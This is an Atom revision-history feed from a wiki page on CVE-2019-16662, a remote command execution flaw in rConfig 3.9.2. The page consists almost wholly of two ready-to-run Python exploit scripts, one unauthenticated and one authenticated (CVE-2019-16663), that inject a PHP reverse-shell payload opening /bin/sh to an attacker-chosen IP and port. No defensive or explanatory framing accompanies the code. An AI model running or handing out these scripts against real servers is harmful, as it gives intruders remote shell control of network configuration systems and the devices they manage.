<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-16662_rConfig_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-16662 rConfig 遠程命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-16662_rConfig_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-16662_rConfig_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T03:19:19Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-16662_rConfig_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2469&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC1== &lt;pre&gt; #!/usr/bin/python  # Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution # Date: 18/09/2019 # Exploit Author: Askar (@mohammadaskar2) # CVE : CV...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-16662_rConfig_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2469&amp;oldid=prev"/>
		<updated>2021-05-05T06:43:11Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC1== &amp;lt;pre&amp;gt; #!/usr/bin/python  # Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution # Date: 18/09/2019 # Exploit Author: Askar (@mohammadaskar2) # CVE : CV...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC1==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
# Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution&lt;br /&gt;
# Date: 18/09/2019&lt;br /&gt;
# Exploit Author: Askar (@mohammadaskar2)&lt;br /&gt;
# CVE : CVE-2019-16662&lt;br /&gt;
# Vendor Homepage: https://rconfig.com/&lt;br /&gt;
# Software link: https://rconfig.com/download&lt;br /&gt;
# Version: v3.9.2&lt;br /&gt;
# Tested on: CentOS 7.7 / PHP 7.2.22&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
from urllib import quote&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
&lt;br /&gt;
if len(sys.argv) != 4:&lt;br /&gt;
    print &amp;quot;[+] Usage : ./exploit.py target ip port&amp;quot;&lt;br /&gt;
    exit()&lt;br /&gt;
&lt;br /&gt;
target = sys.argv[1]&lt;br /&gt;
&lt;br /&gt;
ip = sys.argv[2]&lt;br /&gt;
&lt;br /&gt;
port = sys.argv[3]&lt;br /&gt;
&lt;br /&gt;
payload = quote(''';php -r '$sock=fsockopen(&amp;quot;{0}&amp;quot;,{1});exec(&amp;quot;/bin/sh -i &amp;amp;lt;&amp;amp;amp;3 &amp;amp;gt;&amp;amp;amp;3 2&amp;amp;gt;&amp;amp;amp;3&amp;quot;);'#'''.format(ip, port))&lt;br /&gt;
&lt;br /&gt;
install_path = target + &amp;quot;/install&amp;quot;&lt;br /&gt;
&lt;br /&gt;
req = requests.get(install_path, verify=False)&lt;br /&gt;
if req.status_code == 404:&lt;br /&gt;
    print &amp;quot;[-] Installation directory not found!&amp;quot;&lt;br /&gt;
    print &amp;quot;[-] Exploitation failed !&amp;quot;&lt;br /&gt;
    exit()&lt;br /&gt;
elif req.status_code == 200:&lt;br /&gt;
    print &amp;quot;[+] Installation directory found!&amp;quot;&lt;br /&gt;
url_to_send = target + &amp;quot;/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=&amp;quot; + payload&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;[+] Triggering the payload&amp;quot;&lt;br /&gt;
print &amp;quot;[+] Check your listener !&amp;quot;&lt;br /&gt;
&lt;br /&gt;
requests.get(url_to_send, verify=False)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==POC2==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
# Exploit Title: rConfig v3.9.2 Authenticated Remote Code Execution&lt;br /&gt;
# Date: 18/09/2019&lt;br /&gt;
# Exploit Author: Askar (@mohammadaskar2)&lt;br /&gt;
# CVE : CVE-2019-16663&lt;br /&gt;
# Vendor Homepage: https://rconfig.com/&lt;br /&gt;
# Software link: https://rconfig.com/download&lt;br /&gt;
# Version: v3.9.2&lt;br /&gt;
# Tested on: CentOS 7.7 / PHP 7.2.22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
from urllib import quote&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
&lt;br /&gt;
if len(sys.argv) != 6:&lt;br /&gt;
    print &amp;quot;[+] Usage : ./exploit.py target username password ip port&amp;quot;&lt;br /&gt;
    exit()&lt;br /&gt;
&lt;br /&gt;
target = sys.argv[1]&lt;br /&gt;
&lt;br /&gt;
username = sys.argv[2]&lt;br /&gt;
&lt;br /&gt;
password = sys.argv[3]&lt;br /&gt;
&lt;br /&gt;
ip = sys.argv[4]&lt;br /&gt;
&lt;br /&gt;
port = sys.argv[5]&lt;br /&gt;
&lt;br /&gt;
request = requests.session()&lt;br /&gt;
&lt;br /&gt;
login_info = {&lt;br /&gt;
    &amp;quot;user&amp;quot;: username,&lt;br /&gt;
    &amp;quot;pass&amp;quot;: password,&lt;br /&gt;
    &amp;quot;sublogin&amp;quot;: 1&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
login_request = request.post(&lt;br /&gt;
    target+&amp;quot;/lib/crud/userprocess.php&amp;quot;,&lt;br /&gt;
     login_info,&lt;br /&gt;
     verify=False,&lt;br /&gt;
     allow_redirects=True&lt;br /&gt;
 )&lt;br /&gt;
&lt;br /&gt;
dashboard_request = request.get(target+&amp;quot;/dashboard.php&amp;quot;, allow_redirects=False)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if dashboard_request.status_code == 200:&lt;br /&gt;
    print &amp;quot;[+] LoggedIn successfully&amp;quot;&lt;br /&gt;
    payload = '''&amp;quot;&amp;quot;&amp;amp;amp;&amp;amp;amp;php -r '$sock=fsockopen(&amp;quot;{0}&amp;quot;,{1});exec(&amp;quot;/bin/sh -i &amp;amp;lt;&amp;amp;amp;3 &amp;amp;gt;&amp;amp;amp;3 2&amp;amp;gt;&amp;amp;amp;3&amp;quot;);'#'''.format(ip, port)&lt;br /&gt;
    encoded_request = target+&amp;quot;/lib/crud/search.crud.php?searchTerm=anything&amp;amp;amp;catCommand={0}&amp;quot;.format(quote(payload))&lt;br /&gt;
    print &amp;quot;[+] triggering the payload&amp;quot;&lt;br /&gt;
    print &amp;quot;[+] Check your listener !&amp;quot;&lt;br /&gt;
    exploit_req = request.get(encoded_request)&lt;br /&gt;
&lt;br /&gt;
elif dashboard_request.status_code == 302:&lt;br /&gt;
    print &amp;quot;[-] Wrong credentials !&amp;quot;&lt;br /&gt;
    exit()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>